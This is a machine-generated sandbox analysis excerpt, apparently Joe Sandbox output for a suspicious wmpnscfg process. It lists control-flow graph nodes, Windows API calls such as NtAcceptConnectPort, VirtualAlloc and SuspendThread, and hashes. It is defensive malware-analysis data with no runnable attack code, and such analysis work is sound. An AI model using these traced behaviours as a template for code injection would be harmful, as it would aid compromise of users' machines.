34508 2446541cd34 34494->34508 34496 2446541ce5f 34495->34496 34497 2446541cce0 34495->34497 34495->34508 34499 2446541a7e0 malloc 34496->34499 34498 2446541ce2e 34497->34498 34502 2446541ccf7 34497->34502 34531 2446541a7e0 34498->34531 34501 2446541ce42 34499->34501 34503 2446541ce93 ReadFile 34501->34503 34504 2446541cd2b 34502->34504 34505 2446541cded 34502->34505 34502->34508 34503->34508 34504->34508 34509 2446541c994 34504->34509 34524 2446541bc64 34505->34524 34510 2446541c9ce 34509->34510 34511 2446541cc66 34509->34511 34510->34511 34512 2446541ca12 calloc 34510->34512 34511->34508 34516 2446541cbd5 34512->34516 34523 2446541ca2d 34512->34523 34513 2446541cc4f 34514 2446541a9d4 free 34513->34514 34514->34511 34515 2446541cbca free 34515->34516 34516->34513 34542 2446541c2d0 34516->34542 34518 2446541cbc2 34546 2446542e398 free free free 34518->34546 34521 2446541aa34 malloc 34521->34523 34523->34515 34523->34518 34523->34521 34535 2446542e7e8 free free free 34523->34535 34536 2446542dbcc 34523->34536 34525 2446541bc92 34524->34525 34526 2446541bd60 34524->34526 34525->34526 34527 2446541bcb5 OpenFileMappingW 34525->34527 34526->34508 34527->34526 34528 2446541bcd2 MapViewOfFile 34527->34528 34529 2446541bd57 CloseHandle 34528->34529 34530 2446541bcf0 34528->34530 34529->34526 34530->34529 34532 2446541a847 34531->34532 34533 2446541a800 34531->34533 34532->34501 34533->34532 34533->34533 34534 2446541a86b malloc 34533->34534 34534->34532 34535->34523 34537 2446542dbde 34536->34537 34538 2446542dbe5 34536->34538 34537->34523 34538->34537 34539 2446542dc1e free 34538->34539 34540 2446542dc24 34538->34540 34539->34540 34540->34537 34547 24465454c3c 34540->34547 34543 2446541c313 34542->34543 34545 2446541c87a 34542->34545 34544 2446541c7c0 VirtualAlloc 34543->34544 34543->34545 34544->34545 34545->34513 34546->34515 34548 24465454c4a 34547->34548 34549 24465454c83 34547->34549 34548->34549 34550 24465454c65 free 34548->34550 34551 24465454c6c free 34548->34551 34549->34537 34550->34551 34551->34549 34552 2446541cee0 34553 2446541cf49 34552->34553 34554 2446541cef3 34552->34554 34555 2446541a7e0 malloc 34554->34555 34556 2446541cf05 34555->34556 34557 2446541cf28 ReadFile 34556->34557 34557->34553 34558 244654284c0 SetErrorMode 34559 244654284d4 34558->34559 34560 2446542b936 socket 34559->34560 34561 2446542b9c3 socket 34560->34561 34562 2446542b97a getsockopt 34560->34562 34564 2446542b9e3 34561->34564 34562->34561 34565 24465422d80 34566 24465422d9f 34565->34566 34567 24465422d90 NtAcceptConnectPort 34565->34567 34567->34566
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000003.3385880626.00007DF4DF3A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3A1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_3_7df4df3a1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
                                                                                                                • String ID: H$H
                                                                                                                • API String ID: 874015164-136785262
                                                                                                                • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                • Instruction ID: 2a8cb843dec3d43c6d5115a766bbdf5ca1a098b08fdd9d31674e5c94c766a526
                                                                                                                • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                • Instruction Fuzzy Hash: A8B1417060CB888FD764EF19D885A9AB7E5FFD4310F040A2FE58AC3251EB34E5458B86

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 24465423218-24465423274 call 244654149e4 3 2446542327a-244654232db call 24465416dfc * 3 call 244654132fc call 24465416dfc 0->3 4 244654242bb-244654242e1 call 244654249f0 0->4 18 244654242a8-244654242a9 3->18 19 244654232e1-24465423bf4 3->19 22 244654242ad-244654242b6 call 24465414a40 18->22 20 24465423bfa-24465423c05 19->20 21 24465423d49-24465423d51 19->21 20->21 23 24465423c0b-24465423c19 20->23 25 24465423dc4-24465423dd5 21->25 26 24465423d53-24465423d58 21->26 22->4 28 24465423d44-24465423d45 23->28 29 24465423c1f-24465423c27 23->29 31 24465423dd7-24465423def 25->31 32 24465423e2e-24465423e34 25->32 26->25 27 24465423d5a-24465423d64 RtlFormatCurrentUserKeyPath 26->27 27->25 33 24465423d66-24465423d77 27->33 28->21 29->28 34 24465423c2d-24465423c45 29->34 31->32 43 24465423df1-24465423df9 31->43 35 24465423e36-24465423e37 32->35 36 24465423e5f-24465423e72 32->36 37 24465423d79-24465423d85 33->37 38 24465423d92-24465423d9a 33->38 39 24465423c4b-24465423c4c 34->39 40 24465423d38-24465423d3c 34->40 41 24465423e39-24465423e58 35->41 36->18 54 24465423e78-24465423e83 36->54 56 24465423d87-24465423d90 37->56 57 24465423dbb-24465423dbc 37->57 44 24465423d9c-24465423db8 call 24465411000 38->44 45 24465423c4f-24465423c5f 39->45 48 24465423d3e-24465423d3f 40->48 41->41 46 24465423e5a-24465423e5b 41->46 49 24465423e0b 43->49 50 24465423dfb-24465423e09 43->50 44->57 53 24465423c71-24465423c73 45->53 46->36 48->28 49->32 55 24465423e0d-24465423e28 49->55 50->32 59 24465423c75-24465423c7a 53->59 60 24465423c61-24465423c6f 53->60 54->18 61 24465423e89-24465423e97 54->61 55->32 56->44 57->25 62 24465423d05-24465423d08 59->62 63 24465423c80 59->63 60->53 61->18 64 24465423e9d-24465423ea5 61->64 65 24465423d15-24465423d24 62->65 66 24465423d0a-24465423d0e 62->66 67 24465423c82-24465423c89 63->67 64->18 68 24465423eab-24465423ecb calloc 64->68 65->45 70 24465423d2a-24465423d36 65->70 66->65 69 24465423d10-24465423d11 66->69 71 24465423c8b-24465423c9f 67->71 72 24465423ca3-24465423ccf 67->72 68->18 73 24465423ed1-24465423ef5 68->73 69->65 70->48 71->67 78 24465423ca1 71->78 74 24465423cf7-24465423cf8 72->74 75 24465423cd1-24465423ce5 call 24465424a1c 72->75 76 24465424014-2446542404f 73->76 77 24465423efb-24465423f0e 73->77 81 24465423cfd-24465423cfe 74->81 75->74 86 24465423ce7-24465423cf5 75->86 89 244654240a7-244654240b7 76->89 90 24465424051-24465424052 76->90 80 24465423f10-24465423f1a 77->80 78->62 83 24465423fe5-24465423ff7 80->83 84 24465423f20-24465423f24 80->84 81->62 83->80 87 24465423ffd-24465424012 83->87 84->83 88 24465423f2a-24465423f74 call 24465424a30 84->88 86->81 87->76 98 24465423f88-24465423f8a 88->98 89->18 97 244654240bd-244654240d3 89->97 92 24465424054-2446542405c 90->92 95 24465424089-2446542409d 92->95 96 2446542405e-24465424063 92->96 95->92 100 2446542409f-244654240a0 95->100 96->95 99 24465424065-2446542406e 96->99 101 244654240d5-244654240d6 97->101 102 24465424149-2446542414f 97->102 103 24465423f76-24465423f86 98->103 104 24465423f8c-24465423fa2 98->104 105 24465424071-24465424074 99->105 100->89 108 244654240d8-244654240e3 101->108 106 244654241a2-244654241a9 102->106 107 24465424151-24465424155 102->107 103->98 109 24465423fa4-24465423fac 104->109 110 24465423fe1 104->110 111 24465424076 105->111 112 2446542407d-24465424087 105->112 116 24465424256-24465424258 106->116 117 244654241af-244654241cf call 244654132fc 106->117 113 2446542415c-24465424167 107->113 114 244654240f4-24465424108 108->114 115 244654240e5-244654240f2 108->115 109->110 118 24465423fae 109->118 110->83 111->112 112->95 112->105 119 24465424189-244654241a0 113->119 120 24465424169-24465424175 113->120 114->102 121 2446542410a 114->121 115->114 134 2446542410c-2446542411b 115->134 124 24465424284-2446542428d 116->124 125 2446542425a-24465424264 116->125 135 244654241e4-244654241f8 call 244654132fc 117->135 136 244654241d1-244654241e2 call 244654135b8 117->136 123 24465423fb0-24465423fc9 call 24465424a1c 118->123 119->106 119->113 120->119 127 24465424177-2446542417e 120->127 121->108 143 24465423fd5-24465423fdb 123->143 144 24465423fcb-24465423fd1 123->144 124->22 126 2446542428f-244654242a6 call 24465416e0c call 2446541563c 124->126 125->124 131 24465424266-24465424280 125->131 126->22 127->119 133 24465424180-24465424187 127->133 131->124 133->119 140 2446542413c 134->140 141 2446542411d-2446542413a 134->141 135->116 150 244654241fa-2446542420b call 244654135b8 135->150 136->135 153 2446542420d-24465424223 call 24465422804 136->153 145 24465424141-24465424143 140->145 141->145 143->110 144->123 149 24465423fd3 144->149 145->102 145->124 149->110 150->116 150->153 153->116 158 24465424225-24465424235 153->158 158->116 160 24465424237-24465424250 158->160 160->116
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentFormatPathUsercalloc
                                                                                                                • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                • API String ID: 4207655178-84560671
                                                                                                                • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                • Instruction ID: 2bdaf12e8e3d7492583a45f8366230e06555267101b2a46cc5bef84d7b17112c
                                                                                                                • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                • Instruction Fuzzy Hash: 9AA29070518B988FD375EF18E8897EAB7E4FB99701F100A6ED98EC3251DB709541CB82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000003.3385880626.00007DF4DF3A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3A1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_3_7df4df3a1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumecallocfree
                                                                                                                • String ID: -
                                                                                                                • API String ID: 167522227-2547889144
                                                                                                                • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                • Instruction ID: b6a963f374d3a9e2baaaf8db593f82c14360af2c8c8994bac9a889c9ca7dfa05
                                                                                                                • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                • Instruction Fuzzy Hash: AC91913060CAC95FEBA4FB65D8986AB73E1FF94311F05452BD54BC6191EF78E8008B82

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2502124517-0
                                                                                                                • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                • Instruction ID: 3397126e9cdbc2383fe5b1d6f5367931f50dee44aed881902241ec37a0061325
                                                                                                                • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                • Instruction Fuzzy Hash: A0318F70208A188FE7A5FF28E8D97AA77E9FB94320F500669D45BC21D0DB74C945CB81

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498125340.00007DF4DF3B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3B1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3b1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationQuerySystem$malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1603438391-0
                                                                                                                • Opcode ID: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                • Instruction ID: 069317277fcc089b8aa0c43ccdf34395dcf7009127010e3bc40dfe26bf512a5c
                                                                                                                • Opcode Fuzzy Hash: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                • Instruction Fuzzy Hash: AD011D346299458FE798EB24EC68AA677E1FFE4301F544129A84BC21A0EE38D505CB42

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 287 24465423158-24465423171 288 2446542317b-2446542317e 287->288 289 24465423173-24465423176 287->289 291 2446542318a-2446542319f 288->291 292 24465423180-24465423185 288->292 290 2446542320e-24465423216 289->290 293 244654231ab-244654231da 291->293 294 244654231a1-244654231a5 291->294 292->290 295 244654231ea 293->295 296 244654231dc-244654231e8 NtAcceptConnectPort 293->296 294->293 297 244654231ef-244654231f1 295->297 296->297 298 2446542320c 297->298 299 244654231f3-244654231fd 297->299 298->290 300 24465423205 299->300 301 244654231ff-24465423203 299->301 302 2446542320a 300->302 301->302 302->298
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                • Instruction ID: 612482f1bde9c83ff98c7d29cf610688b55d2f4dba8237263bd86ddf311d57ea
                                                                                                                • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                • Instruction Fuzzy Hash: E921D270708A684FE754AF99B8CD73976F8E7AA301F51057EEA09C3290DA35C948CB42

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 390 2446541262c-24465412666 call 2446545342c 393 24465412738-2446541273b 390->393 394 2446541266c-24465412680 call 24465453426 Thread32First 390->394 396 2446541288e-244654128a1 393->396 397 24465412741-24465412749 393->397 401 24465412685-2446541268a 394->401 397->396 399 2446541274f-24465412750 397->399 400 24465412752-2446541276b 399->400 406 2446541287e-24465412888 400->406 407 24465412771-24465412788 SuspendThread 400->407 402 24465412716-24465412722 call 24465453420 401->402 403 24465412690-2446541269a 401->403 409 24465412727-24465412729 402->409 403->402 410 2446541269c-244654126a6 403->410 406->396 406->400 412 24465412796-24465412798 407->412 409->401 411 2446541272f-24465412732 CloseHandle 409->411 410->402 418 244654126a8-244654126ae 410->418 411->393 413 2446541279e-244654127a2 412->413 414 24465412873-2446541287c 412->414 416 244654127a4-244654127ae 413->416 417 244654127b0-244654127b1 413->417 414->406 419 244654127b4-244654127b6 416->419 417->419 421 244654126d6-244654126dc 418->421 422 244654126b0-244654126d2 418->422 419->414 425 244654127bc-244654127d2 419->425 423 24465412705-24465412712 421->423 424 244654126de-244654126f8 421->424 422->411 428 244654126d4 422->428 423->402 424->411 433 244654126fa-24465412702 424->433 427 244654127d4-244654127e5 425->427 430 244654127e7-244654127ea 427->430 431 244654127fe 427->431 428->423 434 244654127f7-244654127fc 430->434 435 244654127ec-244654127f5 430->435 432 24465412800-2446541280a 431->432 436 2446541280c-2446541280e 432->436 437 24465412862-2446541286a 432->437 433->423 434->432 435->432 438 24465412814-24465412821 436->438 439 244654128ad-244654128b1 436->439 437->427 440 24465412870-24465412871 437->440 441 2446541283d 438->441 442 24465412823-2446541282e 438->442 443 244654128bf-244654128cc 439->443 444 244654128b3-244654128bd 439->444 440->414 447 2446541283f-24465412842 441->447 445 24465412830-2446541283b 442->445 446 244654128a2-244654128ab 442->446 448 244654128e9-244654128ed 443->448 449 244654128ce-244654128da 443->449 444->443 444->447 445->441 445->442 446->447 447->437 452 24465412844-2446541285b 447->452 448->441 453 244654128f3-244654128f6 448->453 450 244654128fb-24465412903 449->450 451 244654128dc-244654128e7 449->451 450->447 451->448 451->449 452->437 453->447
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleSuspendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038686644-0
                                                                                                                • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                • Instruction ID: 5d51454c620e6c76212ccbc66edf6e048a0531d62cb1291c0ae64ef275c7cd01
                                                                                                                • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                • Instruction Fuzzy Hash: A091E13020CA358BEB78BB29E89A37A73D5FB57310F154299D95AC7185DE34D842CB81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498844093.00007DF4DF3E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3E1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3e1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationQuerySystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3562636166-0
                                                                                                                • Opcode ID: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                • Instruction ID: 5030fd5962fc26afb63bfd06e3d745e26475c9314679647cbe4500b341e9fc73
                                                                                                                • Opcode Fuzzy Hash: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                • Instruction Fuzzy Hash: B60144346189858FF785EB25DC58B6677E1FFA4301F444529E84BC21A0DFBCD544CB41
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3499476686.00007DF4DF401000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF401000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df401000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FunctionProtectTableTimerVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2248422592-0
                                                                                                                • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                • Instruction ID: dd9c2a91fe1e65e54b568216a121bd056781b304a22869f023f6cff4424c9597
                                                                                                                • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                • Instruction Fuzzy Hash: 8AE17430608A894FEBA5EF28D8995AA77E1FFA4311F14453FE84BC3192EB34E5858741
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                • Instruction ID: fc394b8d61996b649dbf92ba98df4656aecc641735a4ae066174d9913eada6de
                                                                                                                • Opcode Fuzzy Hash: 41294f9132f532288ebac11fc5ffb7e2a185503835a2c4f2160672799294d73b
                                                                                                                • Instruction Fuzzy Hash: AB22283061C6744EE73DFB18A89A3B9B7D4FB86301F24066ED9DBC2182DA38D546C781
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                • Instruction ID: d76acd4c9fbd75e7911df352e20eeced2544184543e3d028741cb3efd31c3faa
                                                                                                                • Opcode Fuzzy Hash: 477f8dc71d31783f34f9248ca41e69be52e3134fae9b2781e769503cf8821e2c
                                                                                                                • Instruction Fuzzy Hash: D981A83061CB798BFB65EB14B84A76AB3E8FB96340F524659ED46C7284DB74D8008682
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                • Instruction ID: ada7fb0bc7e2cf0302d55e696664e98297eaf1d45660c024ca285a7e83f63c36
                                                                                                                • Opcode Fuzzy Hash: 3e504d11f5da52f1af1682200719c15ad2bad24be6b07785b1bf4d7c48f26462
                                                                                                                • Instruction Fuzzy Hash: 3EF0B774A2CB948FDB64EB2CE489B5977E0FB99300F504559E84CC3245EE3498408B86
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                • Instruction ID: 34db02d328643ed9525fcafdb8757167b6ffa334b940490f86e2f1cec8803dae
                                                                                                                • Opcode Fuzzy Hash: a3b54702dbe03003ef4b69b8382696d02528a9294142f6c5061081efdfa68d71
                                                                                                                • Instruction Fuzzy Hash: 16E09B712186148FDB00EF94DCC5A69B7E4F7D5304F410D69ED4ACA164D674D548C682
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                • Instruction ID: 34ca897cfc9e71b86857013331daf6b5604d35308d13d1d53ab5b1cdb03eb206
                                                                                                                • Opcode Fuzzy Hash: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                • Instruction Fuzzy Hash: DED01234A28B558BD710AB2898417097BE1F7DA314F558658E84483721E639D441C687
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                • Instruction ID: ef38e9c60cec2a8287b0c4c0160dfe54682d9b4b3fef72f4425a6bc25dc74e25
                                                                                                                • Opcode Fuzzy Hash: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                • Instruction Fuzzy Hash: 73D01234A287598BD710AB28A9417097BE1F7DB314F55465CEC44C3310E639D44086C6
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                • Instruction ID: cb9e96bacf7bc552572028a7de5b310bc0f105ea787c52cabf6f389cc44cfdaa
                                                                                                                • Opcode Fuzzy Hash: 89f4a05ad4cf7a5c42d1f7300e09080cac91406142c330baf98efa371945559f
                                                                                                                • Instruction Fuzzy Hash: A9D05E34A38A998BDB50B728A90170537E1F7D6304F924658A848C3204EA3DD4408287
                                                                                                                APIs
                                                                                                                • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,0000024465415367), ref: 0000024465422DEC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                • Instruction ID: 91ff05a290ddfa00ddcebf12a1efa8480f43b040f2f5b0fb37fa78ef7db3780b
                                                                                                                • Opcode Fuzzy Hash: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                • Instruction Fuzzy Hash: 7AC08C2063C83B4BEA24726E6C867142084B34F344FC10040E804C2184FC5CC480539A
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3482435871.0000024465411000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000024465411000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_24465411000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                • Instruction ID: 52ad54f4fd1a261aabebd3e427fe267b6750c222bc813e525f80beb55d6cb297
                                                                                                                • Opcode Fuzzy Hash: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                • Instruction Fuzzy Hash: 07C08C04B2C83A4AEB0676AABC863143098A34F300FC101409804C2180EC1DC4804392
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000003.3385880626.00007DF4DF3A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3A1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_3_7df4df3a1000_wmpnscfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 4069062851-0
                                                                                                                • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                • Instruction ID: 72b2e766f9e5f842cbd05d1a29e2d1efa2ebfb2e3dec8df384349cd17ef96a02
                                                                                                                • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                • Instruction Fuzzy Hash: A1410E7151CA888BE765EB24D899BDBB3E1FF94301F404A2EE48BC6191EF78D5048B42

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000020.00000002.3498125340.00007DF4DF3B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4DF3B1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_32_2_7df4df3b1000_wmpnscfg.jbxd
                                                                                                                Similarity
